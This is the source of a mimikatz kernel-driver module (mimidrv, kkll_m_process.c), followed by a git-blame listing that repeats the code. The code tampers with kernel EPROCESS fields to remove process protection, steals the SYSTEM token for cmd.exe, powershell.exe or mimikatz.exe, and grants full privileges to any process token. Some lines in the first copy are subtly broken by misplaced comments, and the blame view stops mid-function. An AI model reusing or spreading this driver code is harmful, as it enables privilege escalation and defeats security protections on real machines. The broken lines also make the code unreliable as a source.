mimikatz/mimidrv/kkll_m_process.c

/*	Benjamin DELPY `gentilkiwi`
	https://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kkll_m_process.h"

const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
{					/*  EprocessNext, EprocessFlags2, TokenPrivs, SignatureProtect */
					/*  dt nt!_EPROCESS -n ActiveProcessLinks -n Flags2 -n SignatureLevel */
#if defined(_M_IX86)
/* UNK	*/	{0},
/* XP	*/	{0x0088},
/* 2K3	*/	{0x0098},
/* VISTA*/	{0x00a0, 0x0224, 0x0040},
/* 7	*/	{0x00b8, 0x026c, 0x0040},
/* 8	*/	{0x00b8, 0x00c0, 0x0040, 0x02d4},
/* BLUE	*/	{0x00b8, 0x00c0, 0x0040, 0x02cc},
/* 10_1507*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
/* 10_1511*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
/* 10_1607*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
/* 10_1703*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
/* 10_1709*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
/* 10_1803*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
/* 10_1809*/{0x00b8, 0x00c8, 0x0040, 0x02f4},
/* 10_1903*/{0x00b8, 0x00c8, 0x0040, 0x0364},
/* 10_1909*/{0x00b8, 0x00c8, 0x0040, 0x0364}, // ?
/* 10_2004*/{0x00e8, 0x00f8, 0x0040, 0x03a4},
#else
/* UNK	*/	{0},
/* XP	*/	{0},
/* 2K3	*/	{0x00e0},
/* VISTA*/	{0x00e8, 0x036c, 0x0040},
/* 7	*/	{0x0188, 0x043c, 0x0040},
/* 8	*/	{0x02e8, 0x02f8, 0x0040, 0x0648},
/* BLUE	*/	{0x02e8, 0x02f8, 0x0040, 0x0678},
/* 10_1507*/{0x02f0, 0x0300, 0x0040, 0x06a8},
/* 10_1511*/{0x02f0, 0x0300, 0x0040, 0x06b0},
/* 10_1607*/{0x02f0, 0x0300, 0x0040, 0x06c8},
/* 10_1703*/{0x02e8, 0x0300, 0x0040, 0x06c8},
/* 10_1709*/{0x02e8, 0x0300, 0x0040, 0x06c8},
/* 10_1803*/{0x02e8, 0x0300, 0x0040, 0x06c8},
/* 10_1809*/{0x02e8, 0x0300, 0x0040, 0x06c8},
/* 10_1903*/{0x02f0, 0x0308, 0x0040, 0x06f8},
/* 10_1909*/{0x02f0, 0x0308, 0x0040, 0x06f8}, // ?
/* 10_2004*/{0x0448, 0x0460, 0x0040, 0x0878},
#endif
};

NTSTATUS kkll_m_process_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PKKLL_M_PROCESS_CALLBACK callback, PVOID pvArg)
{
	NTSTATUS status = STATUS_SUCCESS;
	PEPROCESS pProcess = NULL;
	for(
		pProcess = PsInitialSystemProcess;
		NT_SUCCESS(status) && (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])) - EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext]) != PsInitialSystemProcess;
		pProcess = (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])) - EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])
		)
	{
		status = callback(szBufferIn, bufferIn, outBuffer, pProcess, pvArg);
	}
	return status;
}

NTSTATUS kkll_m_process_list_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg)
{
	NTSTATUS status;
	PKIWI_PROCESS_SIGNATURE_PROTECTION pSignatureProtect = NULL;
	PULONG pFlags2 = NULL;

	HANDLE processId = PsGetProcessId(pProcess);
	PCHAR processName = PsGetProcessImageFileName(pProcess);

	status = kprintf(outBuffer, L"%u\t%-14S", processId, processName);
	if(NT_SUCCESS(status))
	{
		if(KiwiOsIndex >= KiwiOsIndex_VISTA)
		{
			pFlags2 = (PULONG) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessFlags2]);
			status = kprintf(outBuffer, L"\t%s", (*pFlags2 & TOKEN_FROZEN_MASK) ? L"F-Tok" : L"     ");
			if(NT_SUCCESS(status))
			{
				if(KiwiOsIndex >= KiwiOsIndex_8)
				{
					pSignatureProtect = (PKIWI_PROCESS_SIGNATURE_PROTECTION) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][SignatureProtect]);
					status = kprintf(outBuffer, L"\tSig %02x/%02x", pSignatureProtect->SignatureLevel, pSignatureProtect->SectionSignatureLevel);
					if(NT_SUCCESS(status) && (KiwiOsIndex > KiwiOsIndex_8))
						status = kprintf(outBuffer, L" [%1x-%1x-%1x]", pSignatureProtect->Protection.Type, pSignatureProtect->Protection.Audit, pSignatureProtect->Protection.Signer);
				}
				else if(*pFlags2 & PROTECTED_PROCESS_MASK)
				{
					status = kprintf(outBuffer, L"\tP-Proc");
				}
			}
		}
		if(NT_SUCCESS(status))
			kprintf(outBuffer, L"\n");
	}
	return status;
}

NTSTATUS kkll_m_process_protect(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)
{
	NTSTATUS status;
	PEPROCESS pProcess = NULL;
	PKIWI_PROCESS_SIGNATURE_PROTECTION pSignatureProtect = NULL;
	PULONG pFlags2 = NULL;
	PMIMIDRV_PROCESS_PROTECT_INFORMATION pInfos = (PMIMIDRV_PROCESS_PROTECT_INFORMATION) bufferIn;

	if(KiwiOsIndex >= KiwiOsIndex_VISTA)
	{
		if(pInfos && (szBufferIn == sizeof(MIMIDRV_PROCESS_PROTECT_INFORMATION)))
		{
			status = PsLookupProcessByProcessId((HANDLE) pInfos->processId, &pProcess);
			if(NT_SUCCESS(status))
			{
				if(KiwiOsIndex < KiwiOsIndex_8)
				{
					pFlags2 = (PULONG) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessFlags2]);
					if(pInfos->SignatureProtection.SignatureLevel)
						*pFlags2 |= PROTECTED_PROCESS_MASK;
					else
						*pFlags2 &= ~PROTECTED_PROCESS_MASK;
				}
				else
				{
					pSignatureProtect = (PKIWI_PROCESS_SIGNATURE_PROTECTION) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][SignatureProtect]);
					pSignatureProtect->SignatureLevel = pInfos->SignatureProtection.SignatureLevel;
					pSignatureProtect->SectionSignatureLevel = pInfos->SignatureProtection.SectionSignatureLevel;
					if(KiwiOsIndex > KiwiOsIndex_8)
						pSignatureProtect->Protection =  pInfos->SignatureProtection.Protection;
				}
				ObDereferenceObject(pProcess);
			}
		}
		else status = STATUS_INVALID_PARAMETER;
	}
	else status = STATUS_NOT_SUPPORTED;

	return status;
}

NTSTATUS kkll_m_process_token(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)
{
	NTSTATUS status = STATUS_SUCCESS;
	PMIMIDRV_PROCESS_TOKEN_FROM_TO pTokenFromTo = (PMIMIDRV_PROCESS_TOKEN_FROM_TO) bufferIn;
	ULONG fromProcessId, toProcessId;
	HANDLE hFromProcess, hFromProcessToken;
	PEPROCESS pFromProcess = PsInitialSystemProcess, pToProcess = NULL;

	if(pTokenFromTo && (szBufferIn == sizeof(MIMIDRV_PROCESS_TOKEN_FROM_TO)))
	{
		if(pTokenFromTo->fromProcessId)
			status = PsLookupProcessByProcessId((HANDLE) pTokenFromTo->fromProcessId, &pFromProcess);
		if(NT_SUCCESS(status) && pTokenFromTo->toProcessId)
			status = PsLookupProcessByProcessId((HANDLE) pTokenFromTo->toProcessId, &pToProcess);
	}

	if(NT_SUCCESS(status))
	{
		status = ObOpenObjectByPointer(pFromProcess, OBJ_KERNEL_HANDLE, NULL, 0, *PsProcessType, KernelMode, &hFromProcess);
		if(NT_SUCCESS(status))
		{
			status = ZwOpenProcessTokenEx(hFromProcess, 0, OBJ_KERNEL_HANDLE, &hFromProcessToken);
			if(NT_SUCCESS(status))
			{
				status = kprintf(outBuffer, L"Token from %u/%-14S\n", PsGetProcessId(pFromProcess), PsGetProcessImageFileName(pFromProcess));
				if(NT_SUCCESS(status))
				{
					if(pToProcess)
						status = kkll_m_process_token_toProcess(szBufferIn, bufferIn, outBuffer, hFromProcessToken, pToProcess);
					else
						status = kkll_m_process_enum(szBufferIn, bufferIn, outBuffer, kkll_m_process_systoken_callback, hFromProcessToken);
				}
				ZwClose(hFromProcessToken);
			}
			ZwClose(hFromProcess);
		}
	}

	if(pToProcess)
		ObDereferenceObject(pToProcess);

	if(pFromProcess && (pFromProcess != PsInitialSystemProcess))
		ObDereferenceObject(pFromProcess);

	return status;
}

NTSTATUS kkll_m_process_systoken_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg)
{
	NTSTATUS status = STATUS_SUCCESS;
	PCHAR processName = PsGetProcessImageFileName(pProcess);

	if((RtlCompareMemory("mimikatz.exe", processName, 13) == 13) || (RtlCompareMemory("cmd.exe", processName, 7) == 7) || (RtlCompareMemory("powershell.exe", processName, 14) == 14))
		status = kkll_m_process_token_toProcess(szBufferIn, bufferIn, outBuffer, (HANDLE) pvArg, pProcess);

	return status;
}

NTSTATUS kkll_m_process_token_toProcess(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, HANDLE hSrcToken, PEPROCESS pToProcess)
{
	PROCESS_ACCESS_TOKEN ProcessTokenInformation = {NULL, NULL};
	HANDLE hToProcess;
	PULONG pFlags2 = NULL;
	NTSTATUS status;
	HANDLE processId = PsGetProcessId(pToProcess);
	PCHAR processName = PsGetProcessImageFileName(pToProcess);

	status = ObOpenObjectByPointer(pToProcess, OBJ_KERNEL_HANDLE, NULL, 0, *PsProcessType, KernelMode, &hToProcess);
	if(NT_SUCCESS(status))
	{
		status = ZwDuplicateToken(hSrcToken, 0, NULL, FALSE, TokenPrimary, &ProcessTokenInformation.Token);
		if(NT_SUCCESS(status))
		{
			if(KiwiOsIndex >= KiwiOsIndex_VISTA)
			{
				pFlags2 = (PULONG) (((ULONG_PTR) pToProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessFlags2]);
				if(*pFlags2 & TOKEN_FROZEN_MASK)
					*pFlags2 &= ~TOKEN_FROZEN_MASK;
				else
					pFlags2 = NULL;
			}

			status = ZwSetInformationProcess(hToProcess, ProcessAccessToken, &ProcessTokenInformation, sizeof(PROCESS_ACCESS_TOKEN));
			if(NT_SUCCESS(status))
				status = kprintf(outBuffer, L" * to %u/%-14S\n", processId, processName);
			else
				status = kprintf(outBuffer, L" ! ZwSetInformationProcess 0x%08x for %u/%-14S\n", status, processId, processName);

			if((KiwiOsIndex >= KiwiOsIndex_VISTA) && pFlags2)
				*pFlags2 |= TOKEN_FROZEN_MASK;

			ZwClose(ProcessTokenInformation.Token);
		}
		ZwClose(hToProcess);
	}
	return status;
}

NTSTATUS kkll_m_process_fullprivileges(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)
{
	NTSTATUS status = STATUS_SUCCESS;
	PEPROCESS pProcess = NULL;
	PACCESS_TOKEN pAccessToken = NULL;
	PKIWI_NT6_PRIVILEGES pPrivileges;
	PULONG pPid = (PULONG) bufferIn;

	if(KiwiOsIndex >= KiwiOsIndex_VISTA)
	{
		if(pPid && (szBufferIn == sizeof(ULONG)))
			status = PsLookupProcessByProcessId((HANDLE) *pPid, &pProcess);
		else
			pProcess = PsGetCurrentProcess();

		if(NT_SUCCESS(status) && pProcess)
		{
			if(pAccessToken = PsReferencePrimaryToken(pProcess))
			{
				status = kprintf(outBuffer, L"All privileges for the access token from %u/%-14S\n", PsGetProcessId(pProcess), PsGetProcessImageFileName(pProcess));
				
				pPrivileges = (PKIWI_NT6_PRIVILEGES) (((ULONG_PTR) pAccessToken) + EPROCESS_OffSetTable[KiwiOsIndex][TokenPrivs]);
				pPrivileges->Present[0] = pPrivileges->Enabled[0] /*= pPrivileges->EnabledByDefault[0]*/ = 0xfc;
				pPrivileges->Present[1] = pPrivileges->Enabled[1] /*= pPrivileges->EnabledByDefault[1]*/ = //...0xff;
				pPrivileges->Present[2] = pPrivileges->Enabled[2] /*= pPrivileges->EnabledByDefault[2]*/ = //...0xff;
				pPrivileges->Present[3] = pPrivileges->Enabled[3] /*= pPrivileges->EnabledByDefault[3]*/ = 0xff;
				pPrivileges->Present[4] = pPrivileges->Enabled[4] /*= pPrivileges->EnabledByDefault[4]*/ = 0x0f;

				PsDereferencePrimaryToken(pAccessToken);
			}

			if(pProcess != PsGetCurrentProcess())
				ObDereferenceObject(pProcess);
		}
	}
	else status = STATUS_NOT_SUPPORTED;

	return status;
}
Initial upload 2014-04-06 18:31:53 +00:00			/* Benjamin DELPY `gentilkiwi`
[new] mimikatz lsadump::postzerologon, to reinit DC password both in local store and AD [change] https instead of http for blog :) 2020-09-17 01:17:11 +00:00			`https://blog.gentilkiwi.com`
Initial upload 2014-04-06 18:31:53 +00:00			`benjamin@gentilkiwi.com`
Global licence update, credits to Vincent LE TOUX for DCSync, and lsadump::hash moved to crypto::hash 2015-08-25 09:19:01 +00:00			`Licence : https://creativecommons.org/licenses/by/4.0/`
Initial upload 2014-04-06 18:31:53 +00:00			`*/`
			`#include "kkll_m_process.h"`

			`const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =`
			`{ /* EprocessNext, EprocessFlags2, TokenPrivs, SignatureProtect */`
[new] mimikatz & mimidrv full support for Windows 1809 2018-12-03 01:06:10 +00:00			`/* dt nt!_EPROCESS -n ActiveProcessLinks -n Flags2 -n SignatureLevel */`
Big update :) [new] mimikatz & mimilib very experimental support for ARM64 [better] code for Mifare protocol [better] code for sekurlsa WinDBG plugin (credential keys, still not good enough) [new] mimilib sub authentication package for @vletoux with 'bad password knocking' and magic password [new] mimikatz: unmarshalling usernames when marshalled [fix] mimikatz SR98/RDM/Busylight could previously crash [fix #184] again and again ;) [fix #172] swscanf_s VS ARRAYSIZE macro [fix #127] stdout/stdin/stderr vs modern Visual Studio and Windows XP support (thank you @Crypt0-M3lon) [code] refactor for defined / !defined 2019-03-25 00:57:56 +00:00			`#if defined(_M_IX86)`
Initial upload 2014-04-06 18:31:53 +00:00			`/* UNK */ {0},`
			`/* XP */ {0x0088},`
			`/* 2K3 */ {0x0098},`
			`/* VISTA*/ {0x00a0, 0x0224, 0x0040},`
			`/* 7 */ {0x00b8, 0x026c, 0x0040},`
			`/* 8 */ {0x00b8, 0x00c0, 0x0040, 0x02d4},`
			`/* BLUE */ {0x00b8, 0x00c0, 0x0040, 0x02cc},`
Welcom to Windows 10 LTSB & current [remove] mimidrv & mimikatz kernel module: Process & Object callbacks remover are not anymore in the program [internal] Windows 10 is now splitted in 1507 (LTSB) and 1511 (current) [internal] mimidrv: Windows 10 support added [internal] mimilib WinDBG module & mimikatz::sekurlsa: Windows 10 MSV / Kerberos Tickets are not specific anymore (offsets table) [internal] Using KULL_M_MEMORY_GLOBAL_OWN_HANDLE instead of local variable in each function 2016-03-27 17:22:36 +00:00			`/* 10_1507*/{0x00b8, 0x00c0, 0x0040, 0x02dc},`
			`/* 10_1511*/{0x00b8, 0x00c0, 0x0040, 0x02dc},`
[update] mimidrv for 2016 up to date [interna] cosmetic 2019-04-08 22:53:35 +00:00			`/* 10_1607*/{0x00b8, 0x00c0, 0x0040, 0x02ec},`
[new] misc::easyntlmchall [typo] Windows version 1707 -> 1703 [internal] kull_m_net_getComputerName [internal] _ReturnAddress() 2017-12-03 20:16:28 +00:00			`/* 10_1703*/{0x00b8, 0x00c0, 0x0040, 0x02ec},`
[new] mimikatz & mimidrv support for Windows 10 build 1803 (17623) x64 [internal] structures for SAM cache 2018-03-22 02:56:19 +00:00			`/* 10_1709*/{0x00b8, 0x00c0, 0x0040, 0x02ec},`
			`/* 10_1803*/{0x00b8, 0x00c0, 0x0040, 0x02ec},`
[new] mimikatz & mimidrv full support for Windows 1809 2018-12-03 01:06:10 +00:00			`/* 10_1809*/{0x00b8, 0x00c8, 0x0040, 0x02f4},`
[new] mimikatz Windows 10 1903 (build 18362) support 2019-05-12 23:17:31 +00:00			`/* 10_1903*/{0x00b8, 0x00c8, 0x0040, 0x0364},`
[new] mimikatz & mimidrv support for Windows 10 2004 (build 19041) 2020-05-18 22:56:24 +00:00			`/* 10_1909*/{0x00b8, 0x00c8, 0x0040, 0x0364}, // ?`
			`/* 10_2004*/{0x00e8, 0x00f8, 0x0040, 0x03a4},`
Initial upload 2014-04-06 18:31:53 +00:00			`#else`
			`/* UNK */ {0},`
			`/* XP */ {0},`
			`/* 2K3 */ {0x00e0},`
			`/* VISTA*/ {0x00e8, 0x036c, 0x0040},`
			`/* 7 */ {0x0188, 0x043c, 0x0040},`
			`/* 8 */ {0x02e8, 0x02f8, 0x0040, 0x0648},`
			`/* BLUE */ {0x02e8, 0x02f8, 0x0040, 0x0678},`
Welcom to Windows 10 LTSB & current [remove] mimidrv & mimikatz kernel module: Process & Object callbacks remover are not anymore in the program [internal] Windows 10 is now splitted in 1507 (LTSB) and 1511 (current) [internal] mimidrv: Windows 10 support added [internal] mimilib WinDBG module & mimikatz::sekurlsa: Windows 10 MSV / Kerberos Tickets are not specific anymore (offsets table) [internal] Using KULL_M_MEMORY_GLOBAL_OWN_HANDLE instead of local variable in each function 2016-03-27 17:22:36 +00:00			`/* 10_1507*/{0x02f0, 0x0300, 0x0040, 0x06a8},`
			`/* 10_1511*/{0x02f0, 0x0300, 0x0040, 0x06b0},`
[update] mimidrv for 2016 up to date [interna] cosmetic 2019-04-08 22:53:35 +00:00			`/* 10_1607*/{0x02f0, 0x0300, 0x0040, 0x06c8},`
[new] misc::easyntlmchall [typo] Windows version 1707 -> 1703 [internal] kull_m_net_getComputerName [internal] _ReturnAddress() 2017-12-03 20:16:28 +00:00			`/* 10_1703*/{0x02e8, 0x0300, 0x0040, 0x06c8},`
[new] mimidrv for Windows 10 version 1709 2017-12-18 02:30:40 +00:00			`/* 10_1709*/{0x02e8, 0x0300, 0x0040, 0x06c8},`
[new] mimikatz & mimidrv support for Windows 10 build 1803 (17623) x64 [internal] structures for SAM cache 2018-03-22 02:56:19 +00:00			`/* 10_1803*/{0x02e8, 0x0300, 0x0040, 0x06c8},`
[new] mimikatz & mimidrv full support for Windows 1809 2018-12-03 01:06:10 +00:00			`/* 10_1809*/{0x02e8, 0x0300, 0x0040, 0x06c8},`
[new] mimikatz Windows 10 1903 (build 18362) support 2019-05-12 23:17:31 +00:00			`/* 10_1903*/{0x02f0, 0x0308, 0x0040, 0x06f8},`
[new] mimikatz & mimidrv support for Windows 10 2004 (build 19041) 2020-05-18 22:56:24 +00:00			`/* 10_1909*/{0x02f0, 0x0308, 0x0040, 0x06f8}, // ?`
			`/* 10_2004*/{0x0448, 0x0460, 0x0040, 0x0878},`
Initial upload 2014-04-06 18:31:53 +00:00			`#endif`
			`};`

			`NTSTATUS kkll_m_process_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PKKLL_M_PROCESS_CALLBACK callback, PVOID pvArg)`
			`{`
			`NTSTATUS status = STATUS_SUCCESS;`
			`PEPROCESS pProcess = NULL;`
			`for(`
			`pProcess = PsInitialSystemProcess;`
Welcom to Windows 10 LTSB & current [remove] mimidrv & mimikatz kernel module: Process & Object callbacks remover are not anymore in the program [internal] Windows 10 is now splitted in 1507 (LTSB) and 1511 (current) [internal] mimidrv: Windows 10 support added [internal] mimilib WinDBG module & mimikatz::sekurlsa: Windows 10 MSV / Kerberos Tickets are not specific anymore (offsets table) [internal] Using KULL_M_MEMORY_GLOBAL_OWN_HANDLE instead of local variable in each function 2016-03-27 17:22:36 +00:00			`NT_SUCCESS(status) && (PEPROCESS) ((ULONG_PTR) ((PVOID ) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])) - EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext]) != PsInitialSystemProcess;`
			`pProcess = (PEPROCESS) ((ULONG_PTR) ((PVOID ) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])) - EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])`
Initial upload 2014-04-06 18:31:53 +00:00			`)`
			`{`
			`status = callback(szBufferIn, bufferIn, outBuffer, pProcess, pvArg);`
			`}`
			`return status;`
			`}`

			`NTSTATUS kkll_m_process_list_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg)`
			`{`
			`NTSTATUS status;`
			`PKIWI_PROCESS_SIGNATURE_PROTECTION pSignatureProtect = NULL;`
			`PULONG pFlags2 = NULL;`

			`HANDLE processId = PsGetProcessId(pProcess);`
			`PCHAR processName = PsGetProcessImageFileName(pProcess);`

			`status = kprintf(outBuffer, L"%u\t%-14S", processId, processName);`
			`if(NT_SUCCESS(status))`
			`{`
			`if(KiwiOsIndex >= KiwiOsIndex_VISTA)`
			`{`
			`pFlags2 = (PULONG) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessFlags2]);`
			`status = kprintf(outBuffer, L"\t%s", (*pFlags2 & TOKEN_FROZEN_MASK) ? L"F-Tok" : L" ");`
			`if(NT_SUCCESS(status))`
			`{`
			`if(KiwiOsIndex >= KiwiOsIndex_8)`
			`{`
			`pSignatureProtect = (PKIWI_PROCESS_SIGNATURE_PROTECTION) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][SignatureProtect]);`
			`status = kprintf(outBuffer, L"\tSig %02x/%02x", pSignatureProtect->SignatureLevel, pSignatureProtect->SectionSignatureLevel);`
			`if(NT_SUCCESS(status) && (KiwiOsIndex > KiwiOsIndex_8))`
			`status = kprintf(outBuffer, L" [%1x-%1x-%1x]", pSignatureProtect->Protection.Type, pSignatureProtect->Protection.Audit, pSignatureProtect->Protection.Signer);`
			`}`
			`else if(*pFlags2 & PROTECTED_PROCESS_MASK)`
			`{`
			`status = kprintf(outBuffer, L"\tP-Proc");`
			`}`
			`}`
			`}`
			`if(NT_SUCCESS(status))`
			`kprintf(outBuffer, L"\n");`
			`}`
			`return status;`
			`}`

			`NTSTATUS kkll_m_process_protect(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)`
			`{`
			`NTSTATUS status;`
			`PEPROCESS pProcess = NULL;`
			`PKIWI_PROCESS_SIGNATURE_PROTECTION pSignatureProtect = NULL;`
			`PULONG pFlags2 = NULL;`
			`PMIMIDRV_PROCESS_PROTECT_INFORMATION pInfos = (PMIMIDRV_PROCESS_PROTECT_INFORMATION) bufferIn;`

			`if(KiwiOsIndex >= KiwiOsIndex_VISTA)`
			`{`
			`if(pInfos && (szBufferIn == sizeof(MIMIDRV_PROCESS_PROTECT_INFORMATION)))`
			`{`
			`status = PsLookupProcessByProcessId((HANDLE) pInfos->processId, &pProcess);`
			`if(NT_SUCCESS(status))`
			`{`
			`if(KiwiOsIndex < KiwiOsIndex_8)`
			`{`
			`pFlags2 = (PULONG) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessFlags2]);`
			`if(pInfos->SignatureProtection.SignatureLevel)`
			`*pFlags2 \|= PROTECTED_PROCESS_MASK;`
			`else`
			`*pFlags2 &= ~PROTECTED_PROCESS_MASK;`
			`}`
			`else`
			`{`
			`pSignatureProtect = (PKIWI_PROCESS_SIGNATURE_PROTECTION) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][SignatureProtect]);`
			`pSignatureProtect->SignatureLevel = pInfos->SignatureProtection.SignatureLevel;`
			`pSignatureProtect->SectionSignatureLevel = pInfos->SignatureProtection.SectionSignatureLevel;`
			`if(KiwiOsIndex > KiwiOsIndex_8)`
			`pSignatureProtect->Protection = pInfos->SignatureProtection.Protection;`
			`}`
			`ObDereferenceObject(pProcess);`
			`}`
			`}`
			`else status = STATUS_INVALID_PARAMETER;`
			`}`
			`else status = STATUS_NOT_SUPPORTED;`

			`return status;`
			`}`

			`NTSTATUS kkll_m_process_token(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)`
			`{`
			`NTSTATUS status = STATUS_SUCCESS;`
			`PMIMIDRV_PROCESS_TOKEN_FROM_TO pTokenFromTo = (PMIMIDRV_PROCESS_TOKEN_FROM_TO) bufferIn;`
			`ULONG fromProcessId, toProcessId;`
			`HANDLE hFromProcess, hFromProcessToken;`
			`PEPROCESS pFromProcess = PsInitialSystemProcess, pToProcess = NULL;`

			`if(pTokenFromTo && (szBufferIn == sizeof(MIMIDRV_PROCESS_TOKEN_FROM_TO)))`
			`{`
			`if(pTokenFromTo->fromProcessId)`
			`status = PsLookupProcessByProcessId((HANDLE) pTokenFromTo->fromProcessId, &pFromProcess);`
			`if(NT_SUCCESS(status) && pTokenFromTo->toProcessId)`
			`status = PsLookupProcessByProcessId((HANDLE) pTokenFromTo->toProcessId, &pToProcess);`
			`}`

			`if(NT_SUCCESS(status))`
			`{`
			`status = ObOpenObjectByPointer(pFromProcess, OBJ_KERNEL_HANDLE, NULL, 0, *PsProcessType, KernelMode, &hFromProcess);`
			`if(NT_SUCCESS(status))`
			`{`
			`status = ZwOpenProcessTokenEx(hFromProcess, 0, OBJ_KERNEL_HANDLE, &hFromProcessToken);`
			`if(NT_SUCCESS(status))`
			`{`
			`status = kprintf(outBuffer, L"Token from %u/%-14S\n", PsGetProcessId(pFromProcess), PsGetProcessImageFileName(pFromProcess));`
			`if(NT_SUCCESS(status))`
			`{`
			`if(pToProcess)`
			`status = kkll_m_process_token_toProcess(szBufferIn, bufferIn, outBuffer, hFromProcessToken, pToProcess);`
			`else`
			`status = kkll_m_process_enum(szBufferIn, bufferIn, outBuffer, kkll_m_process_systoken_callback, hFromProcessToken);`
			`}`
			`ZwClose(hFromProcessToken);`
			`}`
			`ZwClose(hFromProcess);`
			`}`
			`}`

			`if(pToProcess)`
			`ObDereferenceObject(pToProcess);`

			`if(pFromProcess && (pFromProcess != PsInitialSystemProcess))`
			`ObDereferenceObject(pFromProcess);`

			`return status;`
			`}`

			`NTSTATUS kkll_m_process_systoken_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg)`
			`{`
			`NTSTATUS status = STATUS_SUCCESS;`
			`PCHAR processName = PsGetProcessImageFileName(pProcess);`

[new] mimidrv for Windows 10 version 1709 2017-12-18 02:30:40 +00:00			`if((RtlCompareMemory("mimikatz.exe", processName, 13) == 13) \|\| (RtlCompareMemory("cmd.exe", processName, 7) == 7) \|\| (RtlCompareMemory("powershell.exe", processName, 14) == 14))`
Initial upload 2014-04-06 18:31:53 +00:00			`status = kkll_m_process_token_toProcess(szBufferIn, bufferIn, outBuffer, (HANDLE) pvArg, pProcess);`

			`return status;`
			`}`

			`NTSTATUS kkll_m_process_token_toProcess(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, HANDLE hSrcToken, PEPROCESS pToProcess)`
			`{`
			`PROCESS_ACCESS_TOKEN ProcessTokenInformation = {NULL, NULL};`
			`HANDLE hToProcess;`
			`PULONG pFlags2 = NULL;`
			`NTSTATUS status;`
			`HANDLE processId = PsGetProcessId(pToProcess);`
			`PCHAR processName = PsGetProcessImageFileName(pToProcess);`

			`status = ObOpenObjectByPointer(pToProcess, OBJ_KERNEL_HANDLE, NULL, 0, *PsProcessType, KernelMode, &hToProcess);`
			`if(NT_SUCCESS(status))`
			`{`
			`status = ZwDuplicateToken(hSrcToken, 0, NULL, FALSE, TokenPrimary, &ProcessTokenInformation.Token);`
			`if(NT_SUCCESS(status))`
			`{`
			`if(KiwiOsIndex >= KiwiOsIndex_VISTA)`
			`{`
			`pFlags2 = (PULONG) (((ULONG_PTR) pToProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessFlags2]);`
			`if(*pFlags2 & TOKEN_FROZEN_MASK)`
			`*pFlags2 &= ~TOKEN_FROZEN_MASK;`
			`else`
			`pFlags2 = NULL;`
			`}`

			`status = ZwSetInformationProcess(hToProcess, ProcessAccessToken, &ProcessTokenInformation, sizeof(PROCESS_ACCESS_TOKEN));`
			`if(NT_SUCCESS(status))`
			`status = kprintf(outBuffer, L" * to %u/%-14S\n", processId, processName);`
			`else`
			`status = kprintf(outBuffer, L" ! ZwSetInformationProcess 0x%08x for %u/%-14S\n", status, processId, processName);`

			`if((KiwiOsIndex >= KiwiOsIndex_VISTA) && pFlags2)`
			`*pFlags2 \|= TOKEN_FROZEN_MASK;`

			`ZwClose(ProcessTokenInformation.Token);`
			`}`
			`ZwClose(hToProcess);`
			`}`
			`return status;`
			`}`

			`NTSTATUS kkll_m_process_fullprivileges(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)`
			`{`
			`NTSTATUS status = STATUS_SUCCESS;`
			`PEPROCESS pProcess = NULL;`
			`PACCESS_TOKEN pAccessToken = NULL;`
			`PKIWI_NT6_PRIVILEGES pPrivileges;`
			`PULONG pPid = (PULONG) bufferIn;`

			`if(KiwiOsIndex >= KiwiOsIndex_VISTA)`
			`{`
[new] mimikatz, mimilib & mimidrv Windows Server 2016 support [fix] mimidrv kkll_m_process_fullprivileges buffer size check 2016-10-25 00:25:34 +00:00			`if(pPid && (szBufferIn == sizeof(ULONG)))`
